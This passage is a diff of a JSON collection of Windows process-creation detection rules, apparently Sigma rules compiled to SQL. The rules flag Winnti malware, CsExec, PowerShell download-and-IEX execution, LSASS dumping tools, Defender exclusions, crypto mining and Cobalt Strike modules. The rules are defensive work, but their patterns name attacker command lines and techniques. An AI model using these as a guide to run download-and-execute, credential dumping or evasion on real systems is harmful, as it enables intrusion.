'\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_zip_compress.yml" + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" }, { - "title": "Verclsid.exe Runs COM Object", - "id": "d06be4b9-8045-428b-a567-740a26d9db25", + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", "status": "test", - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "author": "Victor Sergeev, oscd.community", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_verclsid_runs_com.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "Suspicious Schtasks Schedule Type With High Privileges", - "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "status": "experimental", - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.resource_development", + "attack.t1587.001", "attack.execution", - "attack.t1053.005" + "attack.t1569.002" ], "falsepositives": [ - "Some installers were seen using this method of creation unfortunately. Filter them in your environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_schtasks_schedule_type_system.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", - "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", + "id": "9fbf5927-5261-4284-a71d-f681029ea574", + "status": "test", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Legitimate activity is expected since compressing files with a password is common." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_7zip_password_compression.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", + "title": "Potential Product Reconnaissance Via Wmic.EXE", + "id": "15434e33-5027-4914-88d5-3d4145ec25a9", "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Nasreddine Bencherchali", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1047" ], "falsepositives": [ - "Scripts or tools that download files and execute them" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_wmic_recon_product.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", - "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", + "title": "Gpresult Display Group Policy Information", + "id": "e56d3073-83ff-4021-90fe-c658e0709e72", + "status": "experimental", + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "Legitimate admin usage" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\gpresult.exe' ESCAPE '\\' AND (CommandLine LIKE '%/z%' ESCAPE '\\' OR CommandLine LIKE '%/v%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_gpresult_execution.yml" }, { - "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", - "id": "48917adc-a28e-4f5d-b729-11e75da8941f", - "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", - "author": "frack113", + "title": "Potential Crypto Mining Activity", + "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", + "status": "stable", + "description": "Detects command line parameters or strings often used by crypto miners", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of crypto miners", + "Some build frameworks" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_defender_exclusion.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "WSF/JSE/JS/VBA/VBE File Execution", + "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "status": "test", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_script_execution.yml" }, { - "title": "Custom Class Execution via Xwizard", - "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "title": "Tap Installer Execution", + "id": "99793437-3e16-439b-be0f-078782cf953d", "status": "test", - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate OpenVPN TAP insntallation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" + "filename": "proc_creation_win_tapinstall_execution.yml" }, { - "title": "Gzip Archive Decode Via PowerShell", - "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "title": "Renamed Remote Utilities RAT (RURAT) Execution", + "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", "status": "experimental", - "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", - "author": "Hieu Tran", + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" + ], "falsepositives": [ - "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Remote Utilities' AND NOT ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_decode_gzip.yml" + "filename": "proc_creation_win_renamed_rurat.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", + "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", + "status": "experimental", + "description": "Detects powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "PowerShell Get-Clipboard Cmdlet Via CLI", + "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", "status": "test", - "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_powershell_get_clipboard.yml" }, { - "title": "LOLBIN Execution Of The FTP.EXE Binary", - "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", "status": "test", - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1053.002" ], "falsepositives": [ - "Unknown" + "Unlikely (at.exe deprecated as of Windows 8)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ftp.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "title": "Potential System Information Discovery Via Wmic.EXE", + "id": "9d5a1274-922a-49d0-87f3-8c653483b909", "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", + "author": "TropChaud", "tags": [ - "attack.execution", - "attack.defense_evasion", - 